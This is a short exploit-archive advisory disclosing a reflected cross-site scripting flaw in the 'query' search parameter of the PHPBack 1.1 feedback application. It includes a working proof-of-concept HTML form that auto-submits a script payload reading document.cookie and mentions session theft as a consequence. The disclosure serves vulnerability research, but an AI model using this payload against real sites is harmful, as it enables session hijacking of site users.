id: 24729
date: 12/15/2015
title: PHPBack 1.1 Cross Site Scripting Vulnerability
author: hyp3rlinx
cves: 

PHPBack 1.1 Cross Site Scripting Vulnerability

Vendor:
====================
www.phpback.org



Product:
===============
phpback v1.1

The open source feedback system, PHPBack is feedback a web application that
you can easily
implement on your website. It gives your customers a way to communicate
their ideas to
improve your products.


Vulnerability Details:
======================
XSS vulnerability exist in search field 'query' parameter allowing
arbitrary client side JS code
execution on victims who click our infected linx or visit our infected
webpage. Session ID theft
may follow as well as possibility to bypass CSRF protections etc...



XSS Exploit code(s):
===================

<form id='InFeCT0r' action="
http://localhost/phpback_v1.1/phpback-1.1c/home/search" method="POST">
<input name="query" type="hidden"
value="'<script>alert(document.cookie)</script>">
<script>document.getElementById('InFeCT0r').submit()</script>
</form>



Description:
=====================================================
Request Method(s):              [+] POST
Vulnerable Product:             [+] phpback v1.1
Vulnerable Parameter(s):        [+] query

#  0day.today [2023-03-22]  #